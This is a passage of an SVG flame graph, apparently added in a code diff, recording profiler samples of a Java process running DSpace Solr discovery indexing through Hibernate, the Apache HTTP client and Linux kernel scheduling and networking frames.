+<title>org/apache/log4j/WriterAppender:::subAppend (1 samples, 0.08%)</title><rect x="792.0" y="309" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="794.98" y="319.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::indexContent (435 samples, 34.52%)</title><rect x="757.3" y="549" width="407.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="760.33" y="559.5" >org/dspace/discovery/SolrServiceImpl:::indexContent</text>
+</g>
+<g >
+<title>process_backlog (16 samples, 1.27%)</title><rect x="95.2" y="469" width="15.0" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="98.22" y="479.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::unIndexContent (8 samples, 0.63%)</title><rect x="1155.3" y="533" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1158.35" y="543.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/UpdateRequest:::writeXML (5 samples, 0.40%)</title><rect x="805.1" y="437" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="808.10" y="447.5" ></text>
+</g>
+<g >
+<title>java/io/FileInputStream:::&lt;init&gt; (2 samples, 0.16%)</title><rect x="789.2" y="405" width="1.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="792.17" y="415.5" ></text>
+</g>
+<g >
+<title>java/io/SequenceInputStream:::nextStream (5 samples, 0.40%)</title><rect x="788.2" y="469" width="4.7" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="791.24" y="479.5" ></text>
+</g>
+<g >
+<title>x86_pmu_enable (16 samples, 1.27%)</title><rect x="65.3" y="613" width="14.9" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="68.25" y="623.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (1 samples, 0.08%)</title><rect x="1150.7" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1153.67" y="447.5" ></text>
+</g>
+<g >
+<title>run_rebalance_domains (1 samples, 0.08%)</title><rect x="80.2" y="581" width="1.0" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="83.24" y="591.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1,118 samples, 88.73%)</title><rect x="118.6" y="805" width="1047.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="121.63" y="815.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>perf_pmu_enable.part.0 (1 samples, 0.08%)</title><rect x="223.5" y="245" width="1.0" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="226.52" y="255.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/TwoPhaseLoad:::doInitializeEntity (2 samples, 0.16%)</title><rect x="316.2" y="437" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="319.24" y="447.5" ></text>
+</g>
+<g >
+<title>tcp_push (1 samples, 0.08%)</title><rect x="84.9" y="741" width="1.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="87.92" y="751.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (1 samples, 0.08%)</title><rect x="114.9" y="757" width="0.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="117.89" y="767.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::getRowFromResultSet (1 samples, 0.08%)</title><rect x="314.4" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="317.37" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1150.7" y="197" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1153.67" y="207.5" ></text>
+</g>
+<g >
+<title>java/util/HashSet:::add (1 samples, 0.08%)</title><rect x="990.5" y="357" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="993.52" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::getCollection (1 samples, 0.08%)</title><rect x="779.8" y="357" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="782.81" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::autoFlushIfRequired (142 samples, 11.27%)</title><rect x="871.6" y="469" width="133.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="874.59" y="479.5" >org/hibernate/in..</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (1 samples, 0.08%)</title><rect x="843.5" y="389" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="846.49" y="399.5" ></text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.08%)</title><rect x="223.5" y="325" width="1.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="226.52" y="335.5" ></text>
+</g>
+<g >
+<title>itable stub (8 samples, 0.63%)</title><rect x="128.0" y="421" width="7.5" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="131.00" y="431.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.08%)</title><rect x="765.8" y="501" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="768.76" y="511.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::execute (1 samples, 0.08%)</title><rect x="1149.7" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1152.73" y="431.5" ></text>
+</g>
+<g >
+<title>update_process_times (1 samples, 0.08%)</title><rect x="158.0" y="309" width="0.9" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="160.97" y="319.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceMetadataBrowseIndexingPlugin:::additionalIndex (54 samples, 4.29%)</title><rect x="819.1" y="517" width="50.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="822.14" y="527.5" >org/d..</text>
+</g>
+<g >
+<title>JVM_IHashCode (1 samples, 0.08%)</title><rect x="1135.7" y="309" width="0.9" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="1138.68" y="319.5" ></text>
+</g>
+<g >
+<title>call_stub (1,118 samples, 88.73%)</title><rect x="118.6" y="613" width="1047.1" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="121.63" y="623.5" >call_stub</text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::getCollection (1 samples, 0.08%)</title><rect x="785.4" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.43" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/entity/AbstractEntityLoader:::load (1 samples, 0.08%)</title><rect x="781.7" y="357" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="784.68" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (6 samples, 0.48%)</title><rect x="700.2" y="437" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="703.21" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/HashSet:::add (1 samples, 0.08%)</title><rect x="1135.7" y="341" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1138.68" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp2/DelegatingPreparedStatement:::executeQuery (1 samples, 0.08%)</title><rect x="777.9" y="373" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.94" y="383.5" ></text>
+</g>
+<g >
+<title>java/util/ArrayList:::iterator (1 samples, 0.08%)</title><rect x="578.5" y="437" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="581.46" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (9 samples, 0.71%)</title><rect x="810.7" y="469" width="8.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="813.71" y="479.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/comparator/NameAscendingComparator:::compare (1 samples, 0.08%)</title><rect x="777.0" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/AbstractConfiguration:::getStringArray (1 samples, 0.08%)</title><rect x="1140.4" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1143.37" y="479.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="817.3" y="341" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="820.27" y="351.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (1 samples, 0.08%)</title><rect x="843.5" y="357" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="846.49" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (1 samples, 0.08%)</title><rect x="1137.6" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1140.56" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (3 samples, 0.24%)</title><rect x="758.3" y="373" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (9 samples, 0.71%)</title><rect x="263.8" y="437" width="8.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="266.79" y="447.5" ></text>
+</g>
+<g >
+<title>newidle_balance (1 samples, 0.08%)</title><rect x="81.2" y="645" width="0.9" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="84.17" y="655.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.08%)</title><rect x="776.1" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="779.06" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (3 samples, 0.24%)</title><rect x="565.3" y="437" width="2.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="568.35" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::getRowFromResultSet (6 samples, 0.48%)</title><rect x="770.4" y="453" width="5.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="773.44" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (82 samples, 6.51%)</title><rect x="1020.5" y="437" width="76.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1023.49" y="447.5" >org/hibe..</text>
+</g>
+<g >
+<title>org/apache/http/HttpHost:::toHostString (1 samples, 0.08%)</title><rect x="1154.4" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1157.41" y="399.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (2 samples, 0.16%)</title><rect x="845.4" y="421" width="1.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="848.37" y="431.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.08%)</title><rect x="758.3" y="277" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="287.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (1 samples, 0.08%)</title><rect x="704.0" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="706.95" y="431.5" ></text>
+</g>
+<g >
+<title>scheduler_tick (1 samples, 0.08%)</title><rect x="87.7" y="565" width="1.0" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="90.73" y="575.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::createJoin (1 samples, 0.08%)</title><rect x="1010.2" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1013.19" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/DefaultConnectionReuseStrategy:::canResponseHaveBody (1 samples, 0.08%)</title><rect x="1156.3" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1159.29" y="447.5" ></text>
+</g>
+<g >
+<title>itable stub (7 samples, 0.56%)</title><rect x="319.0" y="453" width="6.6" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="322.05" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/entity/EntitySerializer:::serialize (10 samples, 0.79%)</title><rect x="792.9" y="373" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/ImmutableHttpProcessor:::process (1 samples, 0.08%)</title><rect x="802.3" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="805.29" y="447.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::set (1 samples, 0.08%)</title><rect x="775.1" y="421" width="1.0" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="778.13" y="431.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendQuery (1 samples, 0.08%)</title><rect x="758.3" y="309" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (20 samples, 1.59%)</title><rect x="849.1" y="469" width="18.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="852.11" y="479.5" ></text>
+</g>
+<g >
+<title>visit_groups_merge (1 samples, 0.08%)</title><rect x="13.7" y="645" width="1.0" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="16.75" y="655.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (1 samples, 0.08%)</title><rect x="843.5" y="373" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="846.49" y="383.5" ></text>
+</g>
+<g >
+<title>futex_wait (4 samples, 0.32%)</title><rect x="10.0" y="773" width="3.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="13.00" y="783.5" ></text>
+</g>
+<g >
+<title>do_futex (50 samples, 3.97%)</title><rect x="13.7" y="789" width="46.9" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="16.75" y="799.5" >do_f..</text>
+</g>
+<g >
+<title>org/dspace/storage/bitstore/BitstreamStorageServiceImpl:::retrieve (1 samples, 0.08%)</title><rect x="797.6" y="229" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="800.60" y="239.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (10 samples, 0.79%)</title><rect x="792.9" y="405" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="415.5" ></text>
+</g>
+<g >
+<title>sun/reflect/DelegatingMethodAccessorImpl:::invoke (1 samples, 0.08%)</title><rect x="777.0" y="373" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="780.00" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::createCriteria (1 samples, 0.08%)</title><rect x="870.7" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="873.65" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/QuietWriter:::write (1 samples, 0.08%)</title><rect x="788.2" y="325" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="791.24" y="335.5" ></text>
+</g>
+<g >
+<title>JVM_FillInStackTrace (1 samples, 0.08%)</title><rect x="1161.9" y="213" width="0.9" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="1164.90" y="223.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (18 samples, 1.43%)</title><rect x="64.3" y="661" width="16.9" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="67.32" y="671.5" ></text>
+</g>
+<g >
+<title>com/sun/proxy/$Proxy40:::createCriteria (1 samples, 0.08%)</title><rect x="870.7" y="485" width="0.9" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="873.65" y="495.5" ></text>
+</g>
+<g >
+<title>java/lang/StringCoding:::decode (1 samples, 0.08%)</title><rect x="790.1" y="229" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="793.11" y="239.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/content/StringBody:::writeTo (4 samples, 0.32%)</title><rect x="798.5" y="309" width="3.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="801.54" y="319.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1150.7" y="357" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1153.67" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (147 samples, 11.67%)</title><rect x="126.1" y="437" width="137.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="129.13" y="447.5" >org/hibernate/eve..</text>
+</g>
+<g >
+<title>swapgs_restore_regs_and_return_to_usermode (12 samples, 0.95%)</title><rect x="1178.8" y="789" width="11.2" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="1181.76" y="799.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::fillInStackTrace (1 samples, 0.08%)</title><rect x="1150.7" y="245" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1153.67" y="255.5" ></text>
+</g>
+<g >
+<title>ctx_sched_in (1 samples, 0.08%)</title><rect x="64.3" y="613" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="67.32" y="623.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isCollectionType (1 samples, 0.08%)</title><rect x="544.7" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="547.75" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/RequestContent:::process (1 samples, 0.08%)</title><rect x="1153.5" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1156.48" y="415.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (130 samples, 10.32%)</title><rect x="1013.0" y="469" width="121.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1016.00" y="479.5" >sun/reflect/Gen..</text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::evict (1 samples, 0.08%)</title><rect x="756.4" y="485" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="759.40" y="495.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor16:::invoke (368 samples, 29.21%)</title><rect x="319.0" y="485" width="344.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="322.05" y="495.5" >sun/reflect/GeneratedMethodAccessor16:::invoke</text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::resolve (1 samples, 0.08%)</title><rect x="1164.7" y="517" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1167.71" y="527.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="797.6" y="85" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="800.60" y="95.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Collection_$$_jvst437_11:::getHibernateLazyInitializer (1 samples, 0.08%)</title><rect x="777.0" y="213" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="223.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/XML:::escape (5 samples, 0.40%)</title><rect x="805.1" y="389" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="808.10" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isCollectionType (4 samples, 0.32%)</title><rect x="519.5" y="421" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="522.46" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/EntityEntryContext:::reentrantSafeEntityEntries (4 samples, 0.32%)</title><rect x="998.0" y="405" width="3.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1001.02" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (12 samples, 0.95%)</title><rect x="745.2" y="469" width="11.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="748.16" y="479.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="817.3" y="181" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="820.27" y="191.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="311.6" y="421" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="314.56" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (130 samples, 10.32%)</title><rect x="1013.0" y="485" width="121.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1016.00" y="495.5" >org/hibernate/c..</text>
+</g>
+<g >
+<title>acpi_ev_sci_xrupt_handler (1 samples, 0.08%)</title><rect x="1124.4" y="293" width="1.0" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="1127.44" y="303.5" ></text>
+</g>
+<g >
+<title>irq_exit (2 samples, 0.16%)</title><rect x="1117.9" y="341" width="1.9" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1120.89" y="351.5" ></text>
+</g>
+<g >
+<title>itable stub (3 samples, 0.24%)</title><rect x="428.6" y="405" width="2.8" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="431.62" y="415.5" ></text>
+</g>
+<g >
+<title>tcp_v4_do_rcv (2 samples, 0.16%)</title><rect x="98.0" y="325" width="1.9" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="101.03" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::execute (1 samples, 0.08%)</title><rect x="815.4" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="818.40" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (4 samples, 0.32%)</title><rect x="741.4" y="469" width="3.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="744.41" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/InputStreamEntity:::writeTo (1 samples, 0.08%)</title><rect x="815.4" y="309" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="818.40" y="319.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%)</title><rect x="783.6" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="786.56" y="463.5" ></text>
+</g>
+<g >
+<title>throwFileNotFoundException (2 samples, 0.16%)</title><rect x="789.2" y="357" width="1.8" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="792.17" y="367.5" ></text>
+</g>
+<g >
+<title>ip_finish_output2 (19 samples, 1.51%)</title><rect x="93.3" y="565" width="17.8" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="96.35" y="575.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeIntegerFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="531.6" y="421" width="1.0" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="534.63" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CascadingAction:::requiresNoCascadeChecking (1 samples, 0.08%)</title><rect x="1001.8" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1004.76" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/DefaultClientConnection:::receiveResponseHeader (1 samples, 0.08%)</title><rect x="1158.2" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.16" y="383.5" ></text>
+</g>
+<g >
+<title>tick_sched_handle (1 samples, 0.08%)</title><rect x="87.7" y="597" width="1.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="90.73" y="607.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::loadCollection (1 samples, 0.08%)</title><rect x="778.9" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="781.87" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="798.5" y="245" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="801.54" y="255.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (1 samples, 0.08%)</title><rect x="1081.4" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1084.37" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::listeners (1 samples, 0.08%)</title><rect x="314.4" y="389" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="317.37" y="399.5" ></text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (2 samples, 0.16%)</title><rect x="799.5" y="293" width="1.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="802.48" y="303.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor17:::invoke (1 samples, 0.08%)</title><rect x="663.7" y="485" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="666.68" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::getRowFromResultSet (1 samples, 0.08%)</title><rect x="782.6" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="785.62" y="415.5" ></text>
+</g>
+<g >
+<title>pick_next_task_fair (1 samples, 0.08%)</title><rect x="81.2" y="661" width="0.9" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="84.17" y="671.5" ></text>
+</g>
+<g >
+<title>intel_tfa_pmu_enable_all (16 samples, 1.27%)</title><rect x="65.3" y="597" width="14.9" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="68.25" y="607.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractType:::isCollectionType (2 samples, 0.16%)</title><rect x="951.2" y="389" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="954.19" y="399.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/FullTextContentStreams$FullTextEnumeration:::nextElement (1 samples, 0.08%)</title><rect x="797.6" y="245" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="800.60" y="255.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::evict (1 samples, 0.08%)</title><rect x="663.7" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="666.68" y="479.5" ></text>
+</g>
+<g >
+<title>pollwake (1 samples, 0.08%)</title><rect x="98.0" y="229" width="1.0" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="101.03" y="239.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc/PgStatement:::executeInternal (1 samples, 0.08%)</title><rect x="758.3" y="325" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="335.5" ></text>
+</g>
+<g >
